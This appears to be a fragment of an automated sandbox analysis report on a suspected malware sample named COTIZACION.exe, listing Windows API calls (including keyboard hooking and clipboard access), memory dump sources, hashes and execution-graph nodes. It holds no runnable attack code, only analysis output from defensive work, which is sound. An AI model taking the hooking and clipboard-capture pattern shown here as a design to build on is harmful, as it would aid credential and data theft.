                                                                                                • lstrcatW.KERNEL32(?,004082B0), ref: 00406557
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00406534
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 2659869361-297319885
                                                                                                • Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                                                                                • Instruction ID: 997ea4b4438496dccce44eacbb2634370b3c3ae0899ac86cf6792f2d8b8f87b4
                                                                                                • Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                                                                                • Instruction Fuzzy Hash: F7D05E31102924AFC2026B58AE08D9B77ACEF46341341406EFAC1B3160CB745D5287ED
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2037043601.0000000070021000.00000020.00000001.01000000.00000006.sdmp, Offset: 70020000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2036962421.0000000070020000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037063212.0000000070024000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2037081100.0000000070026000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_70020000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeGlobal$__alldvrm
                                                                                                • String ID:
                                                                                                • API String ID: 482422042-0
                                                                                                • Opcode ID: 31395a117a85d5f977612584bcb3da6e72a52fd76127e202fb0de92e166157dc
                                                                                                • Instruction ID: 1ec609fd4f0335b70da1f7339461fb1b0b4ee32efd86c70c828940593a58c829
                                                                                                • Opcode Fuzzy Hash: 31395a117a85d5f977612584bcb3da6e72a52fd76127e202fb0de92e166157dc
                                                                                                • Instruction Fuzzy Hash: 42510532608305CED7119E75BD805EEB6FBABE8E33B21492EF44383305E7A19D818291
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(00000000), ref: 00403378
                                                                                                • GetTickCount.KERNEL32 ref: 00403397
                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,0040362D,00000000), ref: 004033B6
                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 004033C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                • String ID:
                                                                                                • API String ID: 2102729457-0
                                                                                                • Opcode ID: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
                                                                                                • Instruction ID: 5fb2c38a213eff1d2f515c73fe307429b33afba48c29838db2cc379488067e45
                                                                                                • Opcode Fuzzy Hash: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
                                                                                                • Instruction Fuzzy Hash: C9F0F870551700EBDB209F60EF8EB163AA8B740B02F505579F941B51F0DB788514CA5C
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 00405852
                                                                                                  • Part of subcall function 004054C6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004054D8
                                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 0040589E
                                                                                                  • Part of subcall function 00401399: MulDiv.KERNEL32(?,00007530,00000000), ref: 004013F9
                                                                                                  • Part of subcall function 00401399: SendMessageW.USER32(?,00000402,00000000), ref: 00401409
                                                                                                Strings
                                                                                                • Misspending Setup: Installing, xrefs: 00405842
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$InitializeUninitialize
                                                                                                • String ID: Misspending Setup: Installing
                                                                                                • API String ID: 1011633862-1677686103
                                                                                                • Opcode ID: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
                                                                                                • Instruction ID: 8d413f420cbd2cda170a8e13f5886ccfc68e5e1a5fc2061566676394b2cd1e54
                                                                                                • Opcode Fuzzy Hash: fae861af5de1a05301b375e788940b7af21e1eb504ad4c379f9acf3cdad0321b
                                                                                                • Instruction Fuzzy Hash: 97F09077800A008EE3416B54AD01B6777A4EBD1305F09C53EEE88A62A1DB794C628A5E
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403436,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\COTIZACION.exe,C:\Users\user\Desktop\COTIZACION.exe,80000000,00000003), ref: 00406CF4
                                                                                                • CharPrevW.USER32(?,00000000), ref: 00406D05
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1999020493.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1998961918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999087100.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999208502.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1999642110.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharPrevlstrlen
                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                • API String ID: 2709904686-2743851969
                                                                                                • Opcode ID: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                                                                                • Instruction ID: 8ca8e9e1e5128dac63b4d4f5950f4db4f9885d0bf84f26727eb387c0c5501f09
                                                                                                • Opcode Fuzzy Hash: 3a3825e1876a518aafdd43096896adb57dd8be29e1d638c1e9cc1f107b5b3402
                                                                                                • Instruction Fuzzy Hash: 75D05E31015924DBD7626B18ED059AF77A8EF0130030A846EE983E3164CB385C9187BD

                                                                                                Execution Graph

                                                                                                Execution Coverage:10.5%
                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:139
                                                                                                Total number of Limit Nodes:13
                                                                                                execution_graph 42630 3b712530 42631 3b712556 42630->42631 42634 3b71065c 42631->42634 42636 3b710667 42634->42636 42635 3b716d41 42639 3b716d3f 42635->42639 42673 3b715cbc 42635->42673 42636->42635 42638 3b716d31 42636->42638 42645 3b871240 42638->42645 42651 3b716e59 42638->42651 42657 3b871288 42638->42657 42662 3b87127b 42638->42662 42667 3b716e68 42638->42667 42647 3b87124c 42645->42647 42646 3b871250 42646->42639 42647->42646 42680 3b871340 42647->42680 42684 3b87132f 42647->42684 42648 3b871328 42648->42639 42653 3b716e76 42651->42653 42652 3b715cbc 4 API calls 42652->42653 42653->42652 42654 3b716f4e 42653->42654 42717 3b717340 42653->42717 42721 3b717331 42653->42721 42654->42639 42658 3b87128b 42657->42658 42660 3b871340 4 API calls 42658->42660 42661 3b87132f 4 API calls 42658->42661 42659 3b871328 42659->42639 42660->42659 42661->42659 42664 3b871288 42662->42664 42663 3b871328 42663->42639 42665 3b871340 4 API calls 42664->42665 42666 3b87132f 4 API calls 42664->42666 42665->42663 42666->42663 42669 3b716e76 42667->42669 42668 3b715cbc 4 API calls 42668->42669 42669->42668 42670 3b716f4e 42669->42670 42671 3b717331 OleInitialize 42669->42671 42672 3b717340 OleInitialize 42669->42672 42670->42639 42671->42669 42672->42669 42674 3b715cc7 42673->42674 42675 3b717054 42674->42675 42676 3b716faa 42674->42676 42678 3b71065c 3 API calls 42675->42678 42677 3b717002 CallWindowProcW 42676->42677 42679 3b716fb1 42676->42679 42677->42679 42678->42679 42679->42639 42681 3b871351 42680->42681 42690 3b872427 42680->42690 42696 3b872501 42680->42696 42681->42648 42685 3b871377 42684->42685 42686 3b87133c 42684->42686 42687 3b871351 42686->42687 42688 3b872427 4 API calls 42686->42688 42689 3b872501 4 API calls 42686->42689 42687->42648 42688->42687 42689->42687 42691 3b87246b 42690->42691 42692 3b8724d4 42691->42692 42694 3b715cbc 4 API calls 42691->42694 42703 3b716f59 42691->42703 42710 3b715c8f 42691->42710 42692->42681 42694->42692 42697 3b872504 42696->42697 42699 3b87253f 42696->42699 42697->42699 42700 3b716f59 4 API calls 42697->42700 42701 3b715cbc 4 API calls 42697->42701 42702 3b715c8f 4 API calls 42697->42702 42698 3b87251a 42698->42681 42699->42681 42700->42698 42701->42698 42702->42698 42704 3b716f64 42703->42704 42705 3b717054 42704->42705 42706 3b716faa 42704->42706 42708 3b71065c 3 API calls 42705->42708 42707 3b717002 CallWindowProcW 42706->42707 42709 3b716fb1 42706->42709 42707->42709 42708->42709 42709->42692 42711 3b715ca5 42710->42711 42712 3b717054 42711->42712 42713 3b716faa 42711->42713 42715 3b71065c 3 API calls 42712->42715 42714 3b717002 CallWindowProcW 42713->42714 42716 3b716fb1 42713->42716 42714->42716 42715->42716 42716->42692 42718 3b71735f 42717->42718 42719 3b717458 42718->42719 42725 3b7178e7 42718->42725 42719->42653 42722 3b717334 42721->42722 42723 3b717326 42722->42723 42724 3b7178e7 OleInitialize 42722->42724 42723->42653 42724->42722 42726 3b7178f4 42725->42726 42730 3b71792f 42725->42730 42729 3b7178f8 42726->42729 42726->42730 42727 3b717973 42727->42718 42728 3b717914 42728->42718 42729->42728 42736 3b7178e7 OleInitialize 42729->42736 42737 3b717940 42729->42737 42730->42727 42732 3b717940 OleInitialize 42730->42732 42733 3b7178e7 OleInitialize 42730->42733 42744 3b7179ff 42730->42744 42731 3b717929 42731->42718 42732->42727 42733->42727 42736->42731 42738 3b717952 42737->42738 42740 3b7179b1 42738->42740 42741 3b717940 OleInitialize 42738->42741 42742 3b7178e7 OleInitialize 42738->42742 42743 3b7179ff OleInitialize 42738->42743 42739 3b717973 42739->42731 42740->42731 42741->42739 42742->42739 42743->42739 42745 3b717a18 42744->42745 42749 3b717ae1 42745->42749 42756 3b717af0 42745->42756 42746 3b717a2d 42746->42727 42750 3b717b27 42749->42750 42751 3b717aec 42749->42751 42754 3b717b33 42750->42754 42764 3b715e6c 42750->42764 42760 3b7175b8 42751->42760 42754->42746 42757 3b717af8 42756->42757 42758 3b7175b8 OleInitialize 42757->42758 42759 3b717b01 42758->42759 42759->42746 42761 3b7175c3 42760->42761 42762 3b715e6c OleInitialize 42761->42762 42763 3b717b01 42761->42763 42762->42763 42763->42746 42765 3b717b68 OleInitialize 42764->42765 42766 3b717bcc 42765->42766 42766->42754 42767 3b7160d0 DuplicateHandle 42768 3b716166 42767->42768 42769 3b717cb0 42770 3b717d0a OleGetClipboard 42769->42770 42771 3b717d4a 42770->42771 42780 3b717260 42781 3b717268 42780->42781 42783 3b71728b 42781->42783 42784 3b715d14 42781->42784 42785 3b7172a0 KiUserCallbackDispatcher 42784->42785 42787 3b71730e 42785->42787 42787->42781 42772 3b7197f2 42773 3b719834 SetWindowsHookExA 42772->42773 42775 3b71987a 42773->42775 42776 3b712378 42777 3b7123e0 CreateWindowExW 42776->42777 42779 3b71249c 42777->42779 42788 3b715e88 42789 3b715e89 GetCurrentProcess 42788->42789 42791 3b715f20 GetCurrentThread 42789->42791 42793 3b715f19 42789->42793 42792 3b715f5d GetCurrentProcess 42791->42792 42794 3b715f56 42791->42794 42797 3b715f93 42792->42797 42793->42791 42794->42792 42795 3b715fbb GetCurrentThreadId 42796 3b715fec 42795->42796 42797->42795
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 79a9435219f25ef6d97320548d933e6150b9066940f4c10a45706c89ae62d1e7
                                                                                                • Instruction ID: 1a926e5b78b81b53104c0a46d05de9277223673442318e8207a9eb94b51cf71f
                                                                                                • Opcode Fuzzy Hash: 79a9435219f25ef6d97320548d933e6150b9066940f4c10a45706c89ae62d1e7
                                                                                                • Instruction Fuzzy Hash: 6563E931D10B1ACADB11EF68C8945A9F7B1FF99300F51D79AE4587B121EB70AAC4CB81

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1072 3b235648-3b235665 1073 3b235667-3b23566a 1072->1073 1074 3b235680-3b235683 1073->1074 1075 3b23566c-3b23567b 1073->1075 1076 3b235685-3b235688 1074->1076 1077 3b23568d-3b235690 1074->1077 1075->1074 1076->1077 1079 3b235692-3b235698 1077->1079 1080 3b23569f-3b2356a2 1077->1080 1081 3b23569a 1079->1081 1082 3b2356b8-3b2356be 1079->1082 1083 3b2356b3-3b2356b6 1080->1083 1084 3b2356a4-3b2356a8 1080->1084 1081->1080 1088 3b2356c4-3b2356cc 1082->1088 1089 3b23581b-3b23584b 1082->1089 1083->1082 1087 3b2356ee-3b2356f1 1083->1087 1085 3b2356ae 1084->1085 1086 3b23580d-3b23581a 1084->1086 1085->1083 1087->1079 1091 3b2356f3-3b2356f6 1087->1091 1088->1089 1090 3b2356d2-3b2356df 1088->1090 1100 3b235855-3b235858 1089->1100 1090->1089 1095 3b2356e5-3b2356e9 1090->1095 1092 3b235705-3b235708 1091->1092 1093 3b2356f8-3b2356fe 1091->1093 1098 3b23570a-3b235717 1092->1098 1099 3b23571c-3b23571f 1092->1099 1096 3b235700 1093->1096 1097 3b23574a-3b23574d 1093->1097 1095->1087 1096->1092 1105 3b235752-3b235755 1097->1105 1098->1099 1101 3b235725-3b235728 1099->1101 1102 3b2357ca-3b2357d0 1099->1102 1103 3b23587a-3b23587d 1100->1103 1104 3b23585a-3b23585e 1100->1104 1107 3b235745-3b235748 1101->1107 1108 3b23572a-3b235740 1101->1108 1113 3b235757-3b235761 1102->1113 1115 3b2357d2 1102->1115 1111 3b235887-3b23588a 1103->1111 1112 3b23587f-3b235886 1103->1112 1109 3b235864-3b23586c 1104->1109 1110 3b23594a-3b235984 1104->1110 1105->1113 1114 3b23576f-3b235772 1105->1114 1107->1097 1107->1105 1108->1107 1109->1110 1119 3b235872-3b235875 1109->1119 1140 3b235986-3b235989 1110->1140 1120 3b2358ac-3b2358af 1111->1120 1121 3b23588c-3b235890 1111->1121 1122 3b235768-3b23576a 1113->1122 1117 3b235780-3b235783 1114->1117 1118 3b235774-3b23577b 1114->1118 1116 3b2357d7-3b2357da 1115->1116 1123 3b2357e2-3b2357e5 1116->1123 1124 3b2357dc-3b2357dd 1116->1124 1127 3b235785-3b235797 1117->1127 1128 3b23579c-3b23579f 1117->1128 1118->1117 1119->1103 1125 3b2358d1-3b2358d4 1120->1125 1126 3b2358b1-3b2358b5 1120->1126 1121->1110 1131 3b235896-3b23589e 1121->1131 1122->1114 1133 3b2357f1-3b2357f4 1123->1133 1134 3b2357e7-3b2357f0 1123->1134 1124->1123 1136 3b2358d6-3b2358dd 1125->1136 1137 3b2358e4-3b2358e7 1125->1137 1126->1110 1135 3b2358bb-3b2358c3 1126->1135 1127->1128 1138 3b2357a1-3b2357c0 1128->1138 1139 3b2357c5-3b2357c8 1128->1139 1131->1110 1132 3b2358a4-3b2358a7 1131->1132 1132->1120 1149 3b2357f6-3b2357f8 1133->1149 1150 3b2357fb-3b2357fd 1133->1150 1135->1110 1141 3b2358c9-3b2358cc 1135->1141 1143 3b235942-3b235949 1136->1143 1144 3b2358df 1136->1144 1145 3b2358e9-3b2358f3 1137->1145 1146 3b2358f8-3b2358fb 1137->1146 1138->1139 1139->1102 1139->1116 1147 3b235a6f-3b235c03 1140->1147 1148 3b23598f-3b235992 1140->1148 1141->1125 1144->1137 1145->1146 1154 3b235913-3b235916 1146->1154 1155 3b2358fd-3b23590e 1146->1155 1221 3b235d39-3b235d4c 1147->1221 1222 3b235c09-3b235c10 1147->1222 1156 3b235994-3b2359a7 1148->1156 1157 3b2359aa-3b2359ad 1148->1157 1149->1150 1151 3b235804-3b235807 1150->1151 1152 3b2357ff 1150->1152 1151->1073 1151->1086 1152->1151 1159 3b235930-3b235932 1154->1159 1160 3b235918-3b23591c 1154->1160 1155->1154 1161 3b2359c7-3b2359ca 1157->1161 1162 3b2359af-3b2359c0 1157->1162 1165 3b235934 1159->1165 1166 3b235939-3b23593c 1159->1166 1160->1110 1164 3b23591e-3b235926 1160->1164 1161->1147 1167 3b2359d0-3b2359d3 1161->1167 1176 3b2359c2 1162->1176 1177 3b235a39-3b235a40 1162->1177 1164->1110 1172 3b235928-3b23592b 1164->1172 1165->1166 1166->1100 1166->1143 1174 3b2359d5-3b2359da 1167->1174 1175 3b2359dd-3b2359e0 1167->1175 1172->1159 1174->1175 1178 3b2359e2-3b2359f3 1175->1178 1179 3b2359fa-3b2359fd 1175->1179 1176->1161 1181 3b235a45-3b235a48 1177->1181 1178->1177 1191 3b2359f5 1178->1191 1182 3b235a17-3b235a1a 1179->1182 1183 3b2359ff-3b235a10 1179->1183 1186 3b235a66-3b235a69 1181->1186 1187 3b235a4a-3b235a5b 1181->1187 1184 3b235a34-3b235a37 1182->1184 1185 3b235a1c-3b235a2d 1182->1185 1183->1156 1193 3b235a12 1183->1193 1184->1177 1184->1181 1185->1177 1198 3b235a2f 1185->1198 1186->1147 1192 3b235d4f-3b235d52 1186->1192 1187->1162 1202 3b235a61 1187->1202 1191->1179 1195 3b235d60-3b235d62 1192->1195 1196 3b235d54-3b235d5b 1192->1196 1193->1182 1200 3b235d64 1195->1200 1201 3b235d69-3b235d6c 1195->1201 1196->1195 1198->1184 1200->1201 1201->1140 1203 3b235d72-3b235d7b 1201->1203 1202->1186 1223 3b235c16-3b235c49 1222->1223 1224 3b235cc4-3b235ccb 1222->1224 1234 3b235c4b 1223->1234 1235 3b235c4e-3b235c8f 1223->1235 1224->1221 1225 3b235ccd-3b235d00 1224->1225 1237 3b235d02 1225->1237 1238 3b235d05-3b235d32 1225->1238 1234->1235 1246 3b235c91-3b235ca2 1235->1246 1247 3b235ca7-3b235cae 1235->1247 1237->1238 1238->1203 1238->1221 1246->1203 1249 3b235cb6-3b235cb8 1247->1249 1249->1203
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $
                                                                                                • API String ID: 0-3993045852
                                                                                                • Opcode ID: 63ff472ec0c5c373058af04ae0d2c2b55dbb1c06288ef43d5e6d41bf2a8734a6
                                                                                                • Instruction ID: f507a8b31f8af8be656d0d171e4d63ceef43825190be0bb9a73dbde61a99ab48
                                                                                                • Opcode Fuzzy Hash: 63ff472ec0c5c373058af04ae0d2c2b55dbb1c06288ef43d5e6d41bf2a8734a6
                                                                                                • Instruction Fuzzy Hash: E722E6B5F012158FEB11CBA4C4D069EBBB2EF85720F24866AD40DAB385DB35DD42CB90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: \VZm
                                                                                                • API String ID: 0-3153696063
                                                                                                • Opcode ID: a1eed1d347f0eacf5dd42328778ed76bb0a542f74206b45d9c1dc601c769fd6e
                                                                                                • Instruction ID: 890c4eeef60c7b6c32e94b9b88039c90d04e444950a643818c31d83955cd1d4b
                                                                                                • Opcode Fuzzy Hash: a1eed1d347f0eacf5dd42328778ed76bb0a542f74206b45d9c1dc601c769fd6e
                                                                                                • Instruction Fuzzy Hash: 62919370E00609CFDF14CFA9C9957DDBBF1AF48305F148129E825AB294DB749989CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d5d2f5315a9387f577ffda7d72bf1d6550e1a06750346fdc68d6bb3e329f555d
                                                                                                • Instruction ID: 0d9039a58839bbfefc9da91271dfe14a6505eb23a74140ada30074fa863581fc
                                                                                                • Opcode Fuzzy Hash: d5d2f5315a9387f577ffda7d72bf1d6550e1a06750346fdc68d6bb3e329f555d
                                                                                                • Instruction Fuzzy Hash: 5C922578E012058FEB14CB68C584B89BBF2FF49714F5586A9D409AB3A1DB35ED86CF40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b624b085d517ee26f4faf7aa3823c248ac72ba6937dd39a2d8f106d77ffeb322
                                                                                                • Instruction ID: 35833d321e13ffd429d728a76349399597a4a53b1e1f954c8d80abe2cf2783e0
                                                                                                • Opcode Fuzzy Hash: b624b085d517ee26f4faf7aa3823c248ac72ba6937dd39a2d8f106d77ffeb322
                                                                                                • Instruction Fuzzy Hash: AC62CE74B012058FEB45DBA8C594B9DBBF6EF89740F148669D40AEB390DB35EC42CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2599743029.000000003B230000.00000040.00000800.00020000.00000000.sdmp, Offset: 3B230000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_3b230000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: d21973baaa0c0f521af4df55461783e499030a64deaa0a271573d0c27db52965
                                                                                                • Instruction ID: e4b3735528c678fbc0fed677d117610c87582bf8890e133ce2f843c263cf7ef2
                                                                                                • Opcode Fuzzy Hash: d21973baaa0c0f521af4df55461783e499030a64deaa0a271573d0c27db52965
                                                                                                • Instruction Fuzzy Hash: 233281B5B013058FEB04DB68D890B9DBBB6FB89750F108626D419EB395CB35EC42CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2572209308.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_150000_COTIZACION.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 108afe956e0b5e5c0b4706ec2b01d9d10ee7843694a520204e328a638ab39504
                                                                                                • Instruction ID: 6a628aae2d233eeb22d05860d5dd06ecdb369904b4b353c96bcb356728976f2c
